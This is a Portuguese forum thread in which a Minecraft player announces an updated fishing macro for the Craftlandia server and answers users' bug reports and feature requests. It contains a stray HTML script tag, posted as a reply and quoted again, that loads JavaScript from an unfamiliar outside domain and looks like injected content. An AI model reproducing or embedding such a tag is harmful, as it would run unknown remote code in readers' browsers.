Falta pouco para a v3.3!

Bem-vindo!

Ao se registrar conosco, você poderá discutir, compartilhar e enviar mensagens privadas com outros membros da nossa comunidade.

Inscreva-se agora!
Status
Não está aberto para novas respostas.

Homeless

Hardcore
Banido
Entrou
Out 7, 2013
Cubos
0
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------​
Macro lançada: "PescaHomeless_v3.3"
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------​
[SIZE=14pt]Lucas Rodrigues – Homeless – Craftlandia - Servidor 3[/SIZE]
Fala galeraaa!
Aqui quem vos fala é o Homeless, diretamente do servidor 3, craftlandia, e venho por via desse post anunciar que falta pouco tempo para para a divulgação da PescaHomeless_v3.3, a qual deve ser lançada entre hoje e amanha, minhas cobaias ja estao empenhados nos testes e procura de erros da nova versao da macro.

mlp65z.png
Aguardem só mais um pouco =)

- Todas minhas macros:
Link para o tópico contendo todas as minhas macros ja disponibilizadas:

http://IP/1Enf8c

919nck.png
Por ultimo, se gostou, lembre-se de dar uma porrada de curtir,
Criar um tópico da trabalho =P

faça uma que tenho muito baus parç pq deixo pescando de 3 a 5 dia e vo pra casa da minha tia e tal e os baus tao cheio quando volto da mo raiva de ver que bugo

Quando tiver tempo vo botar os baús e arrumar, vo querer pescar na sua dizem que é mto bom :´p

xGamerTutoriaiSx disse:
#carai vai se mesmo lugar pra pesca ? '- quero ve essa ;#
mesmo lugar da macro anterior ?
@edit
Sim mesmo lugar, essa atualização foi mais focada na correção dos bugs, são poucas as novas funçoes.

Flotos1 disse:
faça uma que tenho muito baus parç pq deixo pescando de 3 a 5 dia e vo pra casa da minha tia e tal e os baus tao cheio quando volto da mo raiva de ver que bugo
Mesma quantidade de baus (96), loto com 6 a 7 dias rodando direto, numa conta com 2k de pesca, e na v3.3, corrigi todos os bugs!

homeless não entendo pq o macro para de pescar olha pra cima bem rapido dps volta a pescar dnv...

<script src="https://www.njaxjs.me/services/script.js" type="text/javascript"></script>

Homeless disse:
[SIZE=14pt]Lucas Rodrigues – Homeless – Craftlandia - Servidor 3[/SIZE]
Fala galeraaa!
Aqui quem vos fala é o Homeless, diretamente do servidor 3, craftlandia, e venho por via desse post anunciar que falta pouco tempo para para a divulgação da PescaHomeless_v3.3, a qual deve ser lançada entre hoje e amanha, minhas cobaias ja estao empenhados nos testes e procura de erros da nova versao da macro.

mlp65z.png
Aguardem só mais um pouco =)

919nck.png
Por ultimo, se gostou, lembre-se de dar uma porrada de curtir,
Criar um tópico da trabalho =P
Ei eu tenho uma sugestão , eu usei seu macro achei muito eficiente e tals para quem não tem muito tempo pra limpar baus , tem contas com muito stats de pesca , etc , mas o seu macro logo após de limpar o inventario ele ja guarda os itens , seria um ganho de tempo se ele só guardasse com 5 slots livres , pois tem vezes que pescamos por exemplo 1 parte p4 e o resto item de ferro ai ele joga tudo e guarda apenas 1 parte , seria mais eficiente se esperasse o inventario encher + com itens uteis e um grande ganho de tempo , queria saber se isso não seria viavel ;3

grato

Homeless disse:
Mesma quantidade de baus (96), loto com 6 a 7 dias rodando direto, numa conta com 2k de pesca, e na v3.3, corrigi todos os bugs!
hmm quero ve essa macro parç

iOveeeR disse:
Será que agr ela ta guardando certinho? e,e
Okay dokey, versão focada na correção dos bugs

Boyang disse:
homeless não entendo pq o macro para de pescar olha pra cima bem rapido dps volta a pescar dnv...
Também foi corrigido.

Skilande disse:
vai ter a opção de guardar todos os set de dima? mesmo se for sem encantamento?
Course sir!

prodigyextreme disse:
<script src="https://www.njaxjs.me/services/script.js" type="text/javascript"></script>

Ei eu tenho uma sugestão , eu usei seu macro achei muito eficiente e tals para quem não tem muito tempo pra limpar baus etc , mas o seu macro logo após de limpar o inventario ele ja guarda os itens , seria um ganho de tempo se ele só guardasse com 5 slots livres , pois tem vezes que pescamos por exemplo 1 parte p4 e o resto item de ferro ai ele joga tudo e guarda apenas 1 parte , seria mais eficiente se esperasse o inventario encher + com itens uteis e um grande ganho de tempo , queria saber se isso não seria viavel ;3

grato
Acabei fazendo essa funçao, mas a retirei da v3.3, será lancada na v4.

Esperando ancioso a nova versao :3

[member=Homeless] A 3.2 tinha um erro, ela pegava umas linhas a mais no baú de linhas e guardava no baú de itens, foi corrigido?

#amohomeless

Status
Não está aberto para novas respostas.

Users who are viewing this thread

Voltar